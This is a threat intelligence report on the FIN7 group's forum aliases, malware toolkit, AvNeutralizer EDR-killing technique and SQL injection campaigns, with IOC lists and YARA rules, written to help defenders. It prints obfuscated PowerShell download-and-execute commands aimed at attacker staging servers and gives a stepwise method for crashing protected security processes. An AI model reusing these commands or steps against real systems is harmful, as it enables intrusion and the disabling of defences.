FIN7 Reboot | Cybercrime Gang Enhances Ops with New EDR Bypasses and Automated Attacks

Executive Summary

  • New evidence shows FIN7 is using multiple pseudonyms to mask the group’s true identity and sustain its criminal operations in the underground market
  • FIN7’s campaigns demonstrate the group’s adoption of automated SQL injection attacks for exploiting public-facing applications
  • AvNeutralizer (aka AuKill), a highly specialized tool developed by FIN7 to tamper with security solutions, has been marketed in the criminal underground and used by multiple ransomware groups
  • SentinelLabs has discovered a new version of AvNeutralizer that utilizes a technique previously unseen in the wild to tamper with security solutions, leveraging the Windows built-in driver ProcLaunchMon.sys (TTD Monitor Driver)
  • Attribution efforts have expanded our understanding of the AvNeutralizer malware family. This research offers a broader perspective than previous research, enabling better evolution tracking and retrospective analysis

Background

FIN7, an elusive and persistent financially motivated threat group with origins in Russia, has been active since 2012, targeting various industry sectors and causing substantial financial losses in industries such as hospitality, energy, finance, high-tech and retail.

Initially, FIN7 specialized in using POS (Point of Sale) malware for financial fraud. However, beginning in 2020, it shifted its focus to ransomware operations, affiliating with notorious RaaS groups such as REvil and Conti as well as launching its own RaaS programs under the names Darkside and subsequently BlackMatter.

The group has created fraudulent infosec firms, such as Combi Security and Bastion Secure, to deceive security researchers and launch ransomware attacks. Despite setbacks like the arrests of some members, FIN7’s activities have continued, suggesting changing TTPs, temporary breaks or the emergence of splinter groups.

This research explores the group’s activities, from underground operations to new TTPs and malicious campaigns, to help defenders better understand and counteract its operations.

Criminal Underground Operations

In our November 3rd, 2022 report, we discussed the connection between FIN7 and the use of EDR evasion tools in ransomware attacks involving the Black Basta group. Our telemetry revealed that the EDR impairment tool, which we track as “AvNeutralizer” (aka AuKill), targeted multiple endpoint security solutions and was used exclusively by the group for six months. This reinforced our hypothesis that FIN7 and Black Basta might have had a close relationship.

New evidence has emerged since our last report allowing us to refine our understanding of the situation.

Beginning in January 2023, we observed a peak in the usage of updated versions of AvNeutralizer by multiple ransomware groups. This suggests that the tool was no longer exclusive to Black Basta, who shifted several TTPs since our last report and removed AvNeutralizer from its arsenal. We hypothesize that AvNeutralizer was likely sold on criminal underground forums, with Black Basta being one of the early buyers and adopters.

After conducting a thorough analysis, we identified multiple advertisements across various underground forums in which we assess with high confidence that these advertisements were promoting the sale of the AvNeutralizer tool.

On May 19th, 2022, a user named “goodsoft” advertised an AV killer tool for a starting price of $4,000 on the exploit[.]in forum, which targeted various endpoint security solutions. Later, on June 14th, 2022, a user named “lefroggy” published a similar advertisement on the xss[.]is forum for $15,000. A week later, on June 21st, a user named “killerAV” posted a similar advertisement on the RAMP forum for $8,000.

AV killer advertisement by ‘goodsoft’, Google translated from RU
AV killer advertisement by ‘goodsoft’, Google translated from RU

We have observed activity from “goodsoft”, “lefroggy” and “killerAV” on several criminal forums, revealing posts consistent with the interests, motivations and TTPs of FIN7.

On August 10th, 2022, “goodsoft” offered their “PentestSoftware” for sale at a monthly rate of $6,500 on the exploit[.]in forum. The advertisement described the software as a post-exploitation framework with multiple modules designed to infiltrate enterprise networks and evade conventional antivirus programs. The poster claimed that a development team had spent over three years and US $1 million creating the software.

The post provides a link to a PDF manual to demonstrate the software’s legitimacy. Our analysis of the manual shows that the “PentestSoftware” being advertised is referred to as “IceBot” and “Remote System Client” in the manual, exhibiting similarities in functionality to the Diceloader malware. Users “killerAV” and “lefroggy” posted similar advertisements for the “PentestSoftware” on the RAMP and xss[.]is forums shortly afterward.

On March 28th, 2023, a user named “Stupor” advertised an AV killer targeting various security solutions for a starting price of $10,000 on the xss[.]is forum. We collected and analyzed the tool, attributing it with high confidence to an updated version of AvNeutralizer and linking it to the same individual identified in our previous report.

AV killer advertisement by ‘Stupor’, Google translated from RU
AV killer advertisement by ‘Stupor’, Google translated from RU

Considering the available evidence and prior intelligence, we assess with high confidence that “goodsoft”, “lefroggy”, “killerAV” and “Stupor” belong to the FIN7 cluster. Furthermore, these threat actors are likely employing multiple pseudonyms on various forums to mask their true identity and sustain their illicit operations within this network.

FIN7 Arsenal

The proficiency of FIN7 in executing sophisticated cyberattacks relies on their versatile arsenal, which includes tools such as Powertrash, Diceloader, Core Impact, an SSH-based backdoor, and AvNeutralizer.

Each of these tools supports various attack phases carried out during the intrusions, allowing the group to adeptly infiltrate, exploit, persist and evade detection.

Powertrash

Powertrash, a heavily obfuscated PowerShell script, is designed to reflectively load an embedded PE file in-memory, enabling the group to stealthily execute their backdoor payloads in their malicious campaigns.

Powertrash has been deployed in FIN7 intrusions as a means to evade defenses.

Powertrash snippet of code
Powertrash snippet of code

Although FIN7 isn’t the sole user of Powertrash, it is one of its main adopters.

In order to gain a better understanding of its usage, we carried out a retrospective analysis of approximately 50 available samples to determine the malware families associated with Powertrash.

To facilitate this process, we developed an unpacker based on the PowerShell Abstract Syntax Tree (AST) for effectively handling the highly obfuscated code and automating payload extraction. We’re making the Powertrash unpacker publicly available to encourage further research.

Timeline of Powertrash-Packed Malware Families
Timeline of Powertrash-Packed Malware Families

Our analysis of the Timeline of Powertrash-Packed Malware Families revealed a consistent pattern in the usage of the group’s C2 implants. Historically, FIN7 has utilized Carbanak, a privately developed and fully featured C2 framework, to carry out their malicious operations. In line with the timeline, Lizar version 2.0 (aka Diceloader) was discovered in Q1 2021 as an evolution of Carbanak and replaced it. Furthermore, the emergence of Powertrash samples delivering Core Impact implants starting in Q2 2022 correlates with “lefroggy” activities in the criminal underground, where was purchasing cracked copies of Core Impact on the xss[.]is forum.

Diceloader

Diceloader, aka Lizar and IceBot, is a minimal backdoor that enables the attacker to establish a C2 channel. This backdoor allows the attacker to control the system by sending position-independent code (or shellcode) modules, loading them directly in memory and sending the output back to the attacker through an encrypted channel.

The payloads contain an encrypted configuration that instructs the bot on which C2 server and port to connect for control. The payload is not designed to be dropped directly on the disk and is compiled with the ReflectiveLoader implementation to allow in-memory reflective loading. Diceloader has typically been deployed through Powertrash loaders in FIN7 operations.

The attacker uses a helper UI client, also referred to as the “Remote System Client”, to interact with the Diceloader C2 servers and control its victims. This UI client can be used by the operator to load additional modules on multiple victims and progress their attacks within the compromised environments.

Remote System Client UI to interact with Diceloader (image by Prodaft)

The Diceloader C2 server implementation does not hide its specific implementation details, and it produces a unique network signature that can be easily fingerprinted. At the time of this research, we were able to track the active Diceloader C2 infrastructure, which was distributed across various countries and hosting providers.

SSH-based Backdoor

During our investigation into the Diceloader C2 infrastructure, we identified a Diceloader C2 server, attributed with high confidence to FIN7, which exposed an open directory web server used as staging server to serve their payloads.

FIN7 open directory web server
FIN7 open directory web server

On this server, we found two Powertrash loaders delivering Diceloader and another directory containing native tools based on OpenSSH and 7zip. These tools appeared to be used as a persistence tactic by the group.

These tools are chained to maintain persistence on the compromised system by downloading the entire toolchain from the staging server and executing the install.bat script.

SSH-based backdoor “install.bat” snippet of code
SSH-based backdoor “install.bat” snippet of code

This script initializes all necessary dependencies and sets up an SFTP server through a reverse SSH tunnel connecting to the attacker’s server using the embedded private key provided in the toolchain. The reverse tunnel is configured as a scheduled task so it can survive reboots. With this setup, the attacker can stealthily exfiltrate files from the compromised machine at any time.

We have observed this tool being exclusively used in intrusions directly operated by FIN7, typically when the group aimed to gather sensitive information from the targeted company.

Core Impact

Core Impact is a penetration testing tool designed for exploitation activities. It offers an extensive library of commercial-grade exploits, aligning well with FIN7’s interests observed in the criminal underground.

The framework enables the generation of Position Independent Code (PIC) implants to take control of exploited systems. These implants come packed with PIC loaders, which use XOR decryption at runtime to evade static detections. The implant configuration includes the C2 server’s IP and port for receiving commands from the attacker, along with an RSA public key for use in the encrypted communication channel.

FIN7 has been delivering Core Impact loaders through Powertrash in their campaigns. To facilitate the analysis of Core Impact implant configurations, we have developed an unpacker that automatically extracts the Core Impact implant from the observed loaders in the wild. The Core Impact unpacker is released as part of this research to encourage further investigation.

Although the RSA public key is initialized when the Core Impact C2 server is started, we have found loaders with overlapping configurations. We attribute, with medium confidence, one specific RSA key to FIN7 operations:

cd19dbaa04ea4b61ace6f8cdfe72dc99a6f807bcda39ceab2fefd1771d44ad288b76bc20eaf9ee26c9a175
bb055f0f2eb800ae6010ddd7b509e061651ab5e883d491244f8c04cbc645717043c74722bee317754ea1
df13e446ca9b1728f1389785daecf915ce27f6806c7bfa2b5764e88e2957d2e9fcfd79597b3421ea4b5e6f

AvNeutralizer

According to our intel, FIN7 began developing a specialized tool to tamper with security solutions in April 2022. We track this tool as “AvNeutralizer” (aka AuKill). The tool has received multiple updates, with a recent iteration including a previously unseen tampering method.

The first usage of this tool, in intrusions detected within our telemetry, was observed in early June 2022. The tool is delivered to buyers as a customized build targeting specific security solutions requested by the buyer. While multiple samples of the tool exhibit the same code, the list of targeted process names may vary based on the attacker’s chosen build.

The earliest version of AvNeutralizer we identified and reported (2fc8b38d3f40d8151ec717c8a8813cf06df90c10) was detected in human-operated intrusions carried out by the Black Basta group, which deployed ransomware to extort victims. This version of the tool exploited weaker versions ( 17.0) of Process Explorer drivers, allowing for cross-process operations between admin processes and protected processes directly from the kernel. The tool utilized this weakness to tamper with security solutions installed on the system.

The userland component was delivered by the attackers during their intrusions using names that mimic the targeted security solutions. We observed file names for the userland component such as AVDieSe.exe, AVDieSophos.exe, AVDieMS.exe and AVDiePanda.exe.

Subsequent updates of AvNeutralizer, detected in our telemetry starting from early 2023, included minor changes like the naming convention that is usually prefixed with “au” followed by the targeted security solution name (e.g., auSentinel.exe, auSophos.exe, auElastic.exe, auSyma.exe) and the usage of the startkey command line parameter. Starting from this version, we observed a significant overlap between what we internally track as AvNeutralizer and the “AuKill” tool documented by Sophos.

Since early 2023, our telemetry data reveals numerous intrusions involving various versions of AvNeutralizer. About 10 of these are attributed to human-operated ransomware intrusions that deployed well-known RaaS payloads including AvosLocker, MedusaLocker, BlackCat, Trigona and LockBit.

Previous research has reported on connections between FIN7 and RaaS groups like LockBit. While we cannot conclusively determine if intrusions involving the LockBit locker and the AvNeutralizer tool were executed by FIN7, we have not found evidence directly linking these activities to the group.

Since Sophos has already provided a detailed analysis of an earlier version of the tool, we will document the updated version of AvNeutralizer (15186e9d03600c667bbe4b34c5e1348bfc0a8168), which now implements previously unseen techniques to tamper with some specific implementations of protected processes.

This updated version has been used in ransomware intrusions starting from April 2023, either as a packed or unprotected payload. Despite different threat actors using the tool, the packer code is identical across various usages, suggesting that FIN7 provides a shared obfuscator to their buyers within the AvNeutralizer bundle.

The packer employs anti-analysis techniques, such as checking the “startkey” command-line argument and using Win32 functions like IsDebuggerPresent and SetUnhandledExceptionFilter to detect debugging executions.

The final PE payload is unpacked with two iterations of XOR decryption, separated by a step of LZNT1 decompression.

The malware uses the ExceptionInfo parameter of the UnhandledExceptionFilter routine (used as the unpacking function) to retrieve the ContextRecord and the values of the debug registers Dr0, Dr1, Dr2, Dr3 and Dr6. These values, set to 0 in non-debugging executions, are used as indexes of the arrays during the decryption routines, causing the unpacking routine to silently fail during debugging sessions to complicate the analysis.

First iteration of XOR decryption in the unpacking function
First iteration of XOR decryption in the unpacking function
Second iteration of XOR decryption in the unpacking function
Second iteration of XOR decryption in the unpacking function

New Technique to Disable Endpoint Security Solutions

The unpacked AvNeutralizer payload (8a03580d29fe1dcc3de9fffaf8960bc339ecd994) employs more than 10 different user mode and kernel mode techniques to tamper with the security solutions installed on the system.

Most of these techniques are already documented, such as removing the PPL protection through the vulnerable RTCore64.sys driver, sandboxing protected processes, leveraging Restart Manager API and Service Control Manager API and more.

However, we discovered a further unique technique that leverages a Windows builtin driver capability previously unseen in the wild.

AvNeutralizer uses a combination of drivers and operations to create a failure in some specific implementations of protected processes, ultimately leading to a denial of service condition. It employs the TTD monitor driver ProcLaunchMon.sys, available on default system installations in the system drivers directory, in conjunction with updated versions of the process explorer driver with version 17.02 (17d9200843fe0eb224644a61f0d1982fac54d844), which has been hardened for cross process operations abuse and is currently not blocked by the Microsoft’s WDAC list.

The steps we observed to be successful in achieving a DoS condition in some protected processes implementations are as follows:

  • Drops the process explorer driver in C:WindowsSystem32PED.sys (17d9200843fe0eb224644a61f0d1982fac54d844), loads and connects to the driver device .PROCEXP152;
  • Loads the driver C:WindowsSystem32driversProcLaunchMon.sys available on the local system and connects to the driver device .com_microsoft_idna_ProcLaunchMon;
  • Configures a new TTD monitoring session by interacting with the ProcLaunchMon driver;
  • Adds the PID of the targeted protected process to the TTD monitoring session, causing newly spawned child processes to be suspended (IOCTL: 0x228034);
  • Uses the procexp driver to kill all non-protected child processes of the targeted protected process; this is still allowed in updated versions of the process explorer driver;
  • The protected process tries to relaunch its child processes, but this time they are suspended by the kernel;
  • The protected process is unable to communicate with its child processes and experiences failures due to this condition, ultimately leading to a crash.
AvNeutralizer Workflow
AvNeutralizer Workflow

Malicious Campaigns

Prodaft’s prior research has highlighted the Checkmarks platform, developed by the FIN7 group as an automated attack system primarily aimed at exploiting public-facing Microsoft Exchange servers. The platform conducts extensive scanning and exploitation by leveraging the ProxyShell exploit, which takes advantage of CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 vulnerabilities.

The Checkmarks platform also incorporates an Auto-SQLi module for SQL Injection attacks. If initial attempts are unsuccessful, the SQLMap tool scans targets for potential SQL injection vulnerabilities. This module provides remote access to the victim’s system, with FIN7 tailoring the system for seamless implementation and adaptability to various situations, thereby expanding the range of exploitable vulnerabilities.

Our findings indicate numerous intrusions leveraging SQL injection vulnerabilities targeting public-facing servers through automated exploitation, which we attribute with medium confidence to FIN7 and the Auto-SQLi module within the Checkmarks system. These intrusions primarily occurred in 2022, with a particular focus during Q3, impacting US companies in the manufacturing, legal and public sector industries.

Execution chain delivering Core Impact implant (as seen by SentinelOne Singularity)
Execution chain delivering Core Impact implant (as seen by SentinelOne Singularity)
Execution chain delivering Diceloader (as seen by SentinelOne Singularity)
Execution chain delivering Diceloader (as seen by SentinelOne Singularity)

Observed exploitation activities involve PowerShell droppers with multiple layers of obfuscation, ultimately leading to the final URL that downloads and executes the implant.

Powershell droppers obfuscation layers
Powershell droppers obfuscation layers

The PowerShell droppers employed in these campaigns deliver Powertrash loaders from staging servers, such as hxxp://193.178.210[.]227/work_53.bin_m7.ps1 and hxxp://45.87.154[.]208/icsnd3b_64refl.ps1.

These Powertrash loaders allow the group to gain control over compromised victim systems by loading a backdoor payload. Specifically, we observed Powertrash loaders named with the “work” prefix loading Core Impact implants connecting to the C2 server 37[.]157[.]254[.]8, while those with the “icsnd” prefix loaded Diceloader connecting to the C2 server 194[.]180[.]174[.]86.

In one specific intrusion, the group installed persistence on the exploited system using the SSH-based backdoor through a batch script named install.bat. We suspect that, given the nature of the targeted company, the group’s intention was to establish a covert and persistent access for future espionage operations.

Conclusion

Our investigation into FIN7’s activities highlights its adaptability, persistence and ongoing evolution as a threat group. In its campaigns, FIN7 has adopted automated attack methods, targeting public-facing servers through automated SQL injection attacks.

Additionally, its development and commercialization of specialized tools like AvNeutralizer within criminal underground forums significantly enhance the group’s impact.

FIN7’s continuous innovation, particularly in its sophisticated techniques for evading security measures, showcases its technical expertise. The group’s use of multiple pseudonyms and collaboration with other cybercriminal entities makes attribution more challenging and demonstrates its advanced operational strategies. We hope this research will inspire further efforts to understand and mitigate FIN7’s evolving tactics.

Indicators of Compromise

SHA1 Notes
05e9e0005fd38a0f168757637c1719d6303bfbac FIN7 Powertrash
343f15cd30791d8d9809ac471bcd39eee0ae09e2 FIN7 Powertrash
671e195ad9c38bbb4985b8643f4de091c47cdde7 FIN7 Powertrash
83082e3843b132e0374f242da42138b35d964759 FIN7 Powertrash
86533fff7813bc140c89bd2ed09b8484afe7e4ac FIN7 Powertrash
8f564864ac8d2b698367da377a32b6ecd2272631 FIN7 Powertrash
cb0da51272207aa98f44d51e79c17033f406cd6a FIN7 Powertrash
fdc5636503862b3cdaa93a48332a4b7c782e2bdf FIN7 Powertrash
0b4974c0d0802f6b8befae8d89abba4593756dfa FIN7 Core Impact implant PIC
1693ec86bb6de6e0fe64f57484e1ce97bf373081 FIN7 Core Impact loader PIC
278b1ee17b057051179bb6302b099cdef3240c84 FIN7 Core Impact implant PIC
52e261a7cab837489dfcb8cd49aaf82ee287968c FIN7 Core Impact loader PIC
7796f28213916157245b248566fa2a1d4811e66e FIN7 Core Impact loader PIC
8857ba79fdefb97ac443a1f3d74b372d19db36a8 FIN7 Core Impact implant PIC
adb6c5607a28f6d60756116c7de91299a1137c83 FIN7 Core Impact loader PIC
f073749b1358017bf0a28f65693765ef6fd0157d FIN7 Core Impact implant PIC
0aeab70affcab0f1e96c62c25dd41dc32d41e2ea FIN7 Diceloader
19f71c7b000f43d6bcbe11234a0e586742b311d1 FIN7 Diceloader
9a6ca844409c6ba2db25a068de40ccad9c952f3a FIN7 Diceloader
0e8fe5b9ff59102b42805342897dff1a8f1ae003 FIN7 SSH-based backdoor
425222ce8b1c6d6d4eacccb7da64ce6d6a6291ca FIN7 SSH-based backdoor component
84f1fd6d0a9ff98c23287c02887811899af4adb7 FIN7 SSH-based backdoor
043f17d7a0f80ed8383ee251b8071c8c46a625eb Powertrash
1300b157a1ee8f5ecde665a1aa1524facfed31c4 Powertrash
1345492b027142c803990ea77aea08dd57b6f304 Powertrash
19ca1aff37c058971c0880516e00654d1e3d27a1 Powertrash
307033dbf90d21522ee6b031856b3faee249ced9 Powertrash
32f3e4f9dfeebc4cf078db7b885151d8936504a6 Powertrash
3c3773421709113acf9918cb2dbdd08dd46497c7 Powertrash
3ea2921a3619eaf9a95eb023a22215005924e8bb Powertrash
3ee8b071c9b844ab643db1a5ca048b482d1adbd3 Powertrash
3f5797defcb57d7dde6eb1d2acf05947b4444260 Powertrash
4625c52e734a51efd431b5ac78c3912eca4cd996 Powertrash
5a6c1f0942ceb25e5d3a5f5e777c812c52bf48fc Powertrash
6984f06e6485e33f84c0f58fa253509f9a2d46fe Powertrash
7908811e3c071a5b828ee48083fef2eee146f4b9 Powertrash
8687b6b1508a93556d6e30d14e5c4ee9971f2d80 Powertrash
88cd32ace737d6dfeb4ffdc299db5a444d113e10 Powertrash
8ba2faee8cacf4ca2ae5b83a2c1c78919dc902b8 Powertrash
8ba9ffa31a1403d436df062d5cebee1d20f9b49a Powertrash
8bf65dbb08bb5c44f869bcc78d4314ccbc1e8d32 Powertrash
91226772402917f7fbfa203e39c9c5af3494b00b Powertrash
95eab0e745e260daaf7022b0c64d25589ead7348 Powertrash
9707e4e4a17039b9401b90bb6f14fa67b7c53415 Powertrash
9abaa7b590c4fb902834ab16df5fb733eab50721 Powertrash
9d28dec1c9882d72f9a74e3fc4e7bc1804d28a2d Powertrash
a3be8b29d46db190d51b2e8a67d127175164227c Powertrash
b21914a068965cb7e715848dedf9399c038da5c2 Powertrash
c7dcbfe93a4de0012a261cfc4abdfddb7770ca98 Powertrash
c833e24b5f698103121bd67f05f81f1d633cbbb0 Powertrash
c9a705395fab442261c174021caa9348ebff6b19 Powertrash
cd1a40c5d624826429b6f403324abc221167704c Powertrash
dbcdbdf927e351d371606e861cee41bbd2be1d33 Powertrash
e292ba2cd4fe3afa2d21c4ced23e15df13395bd1 Powertrash
e4074c75993960298838b44855665553709d89dd Powertrash
fe9f23bbeb9737b066675a55aa5b66171c804c37 Powertrash
3ce8f2ac69e43f556cedd34b8c792e032eb4ee19 Core Impact loader PIC
58fad3ef8a4f44e973d1609bfd7caf756de98424 Core Impact implant PIC
8a3ee88e7b64aade814745d76906461a063883ff Core Impact implant PIC
b5a53f2762b7d7c09ecebe1e0838828d7f42f2bd Core Impact loader PIC
16c8dde4565958589cd81af33c9f09817216eda0 Diceloader
23924e8ebd19be1f05ffed774ec5481503cf4cd5 Diceloader
297e1f284a758847df8596b04a1c7f17241e9072 Diceloader
311eaa735f4ae0b34e5943f150db0e796173846c Diceloader
3f07408a0beb184b30fb6affdf2c57ccc6f99e4d Diceloader
47cf95118d0ec3a50aeb09677f378cac508052a4 Diceloader
617627f0dd70011773dd16c6a15a2de2942d34dd Diceloader
6772e23cfbf42a4aef63bdf7c8844fe61208b628 Diceloader
67ca301c74d2c9e294eedf790f40a9d358dee0f3 Diceloader
6dfac9c62f35a527a86904b49fe97a0eb9c912be Diceloader
6fa8b56e1f6067007503e5df351e2e75386ac072 Diceloader
79d9724d37bfda0bd8cd26ecf50ed07c9d18dd64 Diceloader
7f66fda7b3616ff31739e174b6f177d9eee77584 Diceloader
c5c1ec58b09ca672d491892469bee92d1e061065 Diceloader
df753441c24c5aef920f9f772f81c43c88e595ee Diceloader
e4954f51c545ba7af4e8c670380cfe03b25490e7 Diceloader
45e8cebbd795d02e082fca25515bbf181f851a3c Carbanak
4e32f3df7d27c991c0e361670879a266298747a6 Carbanak
acc1c19abf7a649b871a0ec4776271b66b8893fb Carbanak
ad6bc38913f98c3f4b57d5415ef6e4d3ee35234a Carbanak
dc4f836a7e5658a649a7eeb30107a4ac7fac9e31 Carbanak
24786e5000670ac8b51a7292d3d384f39c466880 Minodo Backdoor
cc37284c6a387b474d2c714496abcbe415ed74eb Cobaltstrike beacon
936447d6a1f69f2b4aaba158504c7b5a09ab6385 Mimikatz Powerkatz dll
15186e9d03600c667bbe4b34c5e1348bfc0a8168 AvNeutralizer packed version
cc17f8dd1ed74955a9c4d8b5a766ef6a2fa6807d AvNeutralizer packed version
07d0c0c315f99c4f1785645ddd4c3fe665c0448c AvNeutralizer
187546da3f90d17329dd999ea481c3ebe3f99845 AvNeutralizer
1c8c903ff1b704236cd061c0b9edcf0a25e5e371 AvNeutralizer
2fc8b38d3f40d8151ec717c8a8813cf06df90c10 AvNeutralizer
323e033566d06a2b5e2873fbc2f846d2c768f2e9 AvNeutralizer
39d01edefd751a59e17319e81362bca911e80fba AvNeutralizer
6b406be948fff3a6510345048343abd570fc7fb9 AvNeutralizer
8a03580d29fe1dcc3de9fffaf8960bc339ecd994 AvNeutralizer
a672c2c05e72b1d9d61e5977ec5e436bfac9c9b7 AvNeutralizer
c73cd7c4475a03cbd88942a37ef437487d99e21c AvNeutralizer
f7b0369169dff3f10e974b9a10ec15f7a81dec54 AvNeutralizer
f9aad333dc17763dfcf33ec13e560a6b89c5d335 AvNeutralizer
ff11360f6ad22ba2629489ac286b6fdf4190846e AvNeutralizer
IP Address Notes
193[.]178[.]210[.]227 FIN7 staging server IP
45[.]87[.]154[.]208 FIN7 staging server IP
37[.]157[.]254[.]8 FIN7 Core Impact C2 IP
213[.]109[.]192[.]198 FIN7 Core Impact C2 IP
213[.]109[.]192[.]116 FIN7 Core Impact C2 IP
104[.]193[.]255[.]99 FIN7 Core Impact C2 IP
194[.]180[.]174[.]86 FIN7 Core Impact/Diceloader C2 IP
91[.]199[.]147[.]152 FIN7 Diceloader C2 IP
193[.]109[.]120[.]69 FIN7 Diceloader C2 IP
194[.]180[.]191[.]85 FIN7 Diceloader C2 IP
185[.]117[.]88[.]245 FIN7 SSH-based backdoor C2 IP
80[.]71[.]157[.]173 FIN7 SSH-based backdoor C2 IP
15[.]235[.]156[.]105 FIN7 SSH-based backdoor C2 IP
185[.]117[.]119[.]108 FIN7 SSH-based backdoor C2 IP
185[.]234[.]247[.]62 FIN7 SSH-based backdoor C2 IP
194[.]104[.]136[.]113 FIN7 SSH-based backdoor C2 IP
185[.]232[.]170[.]83 FIN7 SSH-based backdoor C2 IP
91[.]149[.]243[.]129 Core Impact C2 IP
194[.]87[.]82[.]7 Diceloader C2 IP
195[.]123[.]246[.]20 Diceloader C2 IP
217[.]12[.]206[.]176 Diceloader C2 IP
45[.]136[.]199[.]128 Diceloader C2 IP
45[.]66[.]249[.]75 Diceloader C2 IP
94[.]158[.]244[.]107 Diceloader C2 IP
5[.]252[.]177[.]7 Diceloader C2 IP
94[.]158[.]244[.]23 Diceloader C2 IP
193[.]42[.]36[.]231 Diceloader C2 IP
94[.]140[.]114[.]173 Diceloader C2 IP
185[.]232[.]170[.]205 Diceloader C2 IP
185[.]250[.]151[.]60 Diceloader C2 IP
207[.]246[.]92[.]213 Diceloader C2 IP
162[.]248[.]225[.]148 Diceloader C2 IP
185[.]172[.]129[.]70 Diceloader C2 IP
46[.]17[.]107[.]7 Diceloader C2 IP
185[.]250[.]151[.]33 Diceloader C2 IP
46[.]17[.]107[.]32 Diceloader C2 IP
185[.]250[.]151[.]141 Diceloader C2 IP
91[.]193[.]19[.]163 Diceloader C2 IP
208[.]88[.]226[.]158 Diceloader C2 IP
108[.]170[.]20[.]89 Diceloader C2 IP
195[.]123[.]240[.]46 Diceloader C2 IP
185[.]16[.]40[.]108 Diceloader C2 IP
95[.]123[.]243[.]169 Diceloader C2 IP
184[.]95[.]51[.]185 Diceloader C2 IP
198[.]15[.]119[.]69 Diceloader C2 IP
37[.]1[.]210[.]119 Diceloader C2 IP
185[.]33[.]87[.]24 Diceloader C2 IP
192[.]248[.]188[.]166 Diceloader C2 IP
185[.]244[.]151[.]114 Diceloader C2 IP
194[.]87[.]191[.]198 Diceloader C2 IP
85[.]239[.]54[.]214 Diceloader C2 IP
185[.]161[.]210[.]11 Diceloader C2 IP
95[.]216[.]251[.]213 Diceloader C2 IP
95[.]217[.]102[.]49 Diceloader C2 IP
62[.]233[.]57[.]163 Diceloader C2 IP
193[.]233[.]22[.]68 Diceloader C2 IP
146[.]59[.]217[.]154 Diceloader C2 IP
193[.]233[.]23[.]158 Diceloader C2 IP
91[.]199[.]147[.]60 Diceloader C2 IP
62[.]233[.]57[.]31 Diceloader C2 IP
95[.]217[.]82[.]121 Diceloader C2 IP
45[.]82[.]13[.]64 Diceloader C2 IP
91[.]149[.]253[.]184 Diceloader C2 IP
193[.]233[.]23[.]59 Diceloader C2 IP
65[.]108[.]20[.]101 Diceloader C2 IP
62[.]233[.]57[.]241 Diceloader C2 IP
65[.]108[.]20[.]165 Diceloader C2 IP
79[.]141[.]162[.]131 Diceloader C2 IP
62[.]233[.]57[.]19 Diceloader C2 IP
185[.]161[.]208[.]45 Diceloader C2 IP
176[.]97[.]75[.]244 Diceloader C2 IP
195[.]123[.]246[.]46 Diceloader C2 IP
91[.]149[.]221[.]195 Diceloader C2 IP
193[.]233[.]23[.]45 Diceloader C2 IP
194[.]87[.]82[.]7 Diceloader C2 IP
195[.]123[.]246[.]20 Diceloader C2 IP
195[.]123[.]218[.]99 Cobaltstrike C2 IP
5[.]161[.]41[.]51 Minodo Backdoor C2 IP
URL Notes
hxxp://193.178.210[.]227/work_53.bin_m7.ps1 FIN7 URL delivering Core Impact implant packed with Powertrash
hxxp://45.87.154[.]208/work_53m8.ps1 FIN7 URL delivering Core Impact implant packed with Powertrash
hxxp://45.87.154[.]208/icsnd3b_64refl.ps1 FIN7 URL delivering Diceloader packed with Powertrash

FIN7 command lines to download and execute backdoor payloads

powershell.exe -ep bypass -w Hidden -noni -c 
"[char[]]'%q>))Ofx.Pckfdu!Ofu/XfcDmjfou*/EpxompbeTusjoh)(i(,(u(,(u(,(q(,(;(,(0(,(0(,(2(,(:(,(4(,(/(,(2(,(8(,(9(,(/(,(3(,(2(,(1(,(/(,(3(,(3(,(8(,(0(,(x(,(p(,(s(,(l(,(`(,(6(,(4(,(/(,(c(,(j(,(o(,(`(,(n(,(8(,(/(,(q(,(t(,(2(**%q}/)(J(,(f(,(Y(*'|%{$s+=[char]([int]$_-1)};$s|.('I'+'e'+'X')"
powershell.exe -ep bypass -w Hidden -noni -Enc
"WwBjAGgAYQByAFsAXQBdACcAJQBkAG8AdQAhAD4AIQAxADwAIQBlAHAAIQB8ACEAJQBkAG8AdQAsACwAPAAhAHUAcwB6ACEAfAAhAGoAZgB5ACEAKQBPAGYAeAAuAFAAYwBrAGYAZAB1ACEATwBmAHUALwBYAGYAYwBEAG0AagBmAG8AdQAqAC8ARQBwAHgAbwBtAHAAYgBlAFQAdQBzAGoAbwBoACkAKABpACgALAAoAHUAKAAsACgAdQAoACwAKABxACgALAAoADsAKAAsACgAMAAoACwAKAAwACgALAAoADUAKAAsACgANgAoACwAKAAvACgALAAoADkAKAAsACgAOAAoACwAKAAvACgALAAoADIAKAAsACgANgAoACwAKAA1ACgALAAoAC8AKAAsACgAMwAoACwAKAAxACgALAAoADkAKAAsACgAMAAoACwAKABqACgALAAoAGQAKAAsACgAdAAoACwAKABvACgALAAoAGUAKAAsACgANAAoACwAKABjACgALAAoAGAAKAAsACgANwAoACwAKAA1ACgALAAoAHMAKAAsACgAZgAoACwAKABnACgALAAoAG0AKAAsACgALwAoACwAKABxACgALAAoAHQAKAAsACgAMgAoACoAIQB+ACEAZABiAHUAZABpACEAfAAhAH4AIQB+ACEAeABpAGoAbQBmACEAKQAlAGQAbwB1ACEALgBtAHUAIQAyADEAKgAnAHwAJQB7ACQAcwArAD0AWwBjAGgAYQByAF0AKABbAGkAbgB0AF0AJABfAC0AMQApAH0AOwBpAGUAeAAgACQAcwA="

YARA Hunting Rules

rule PS1_Powertrash {
    meta:
    	author = "Antonio Cocomazzi @ SentinelOne"
    	description = "Detects Powertrash: an obfuscated powershell in-memory loader"
    	date = "2023-04-17"
    	reference1 = "https://s1.ai/FIN7-u"
    	reference2 = "https://www.mandiant.com/resources/evolution-of-fin7"
    	reference3 = "https://blog.morphisec.com/vmware-identity-manager-attack-backdoor"
    	hash = "86533fff7813bc140c89bd2ed09b8484afe7e4ac"  	 
    strings:
  	  $regex_packer_signature = /functions[0-9a-zA-Z]{3,7}r?n{r?n($[0-9a-zA-Z]{3,7}=.*r?n){10}/ ascii wide
    condition:
   	 filesize > 50KB and filesize  5MB and $regex_packer_signature
}

rule Win32_Diceloader {
    meta:
    	author = "Antonio Cocomazzi @ SentinelOne"
    	description = "Detects Diceloader, aka Lizar/IceBot, a backdoor designed to infiltrate enterprise networks and evade conventional antivirus programs"
    	date = "2023-04-17"
    	reference1 = "https://s1.ai/FIN7-u"
    	hash = "0aeab70affcab0f1e96c62c25dd41dc32d41e2ea"
    strings:
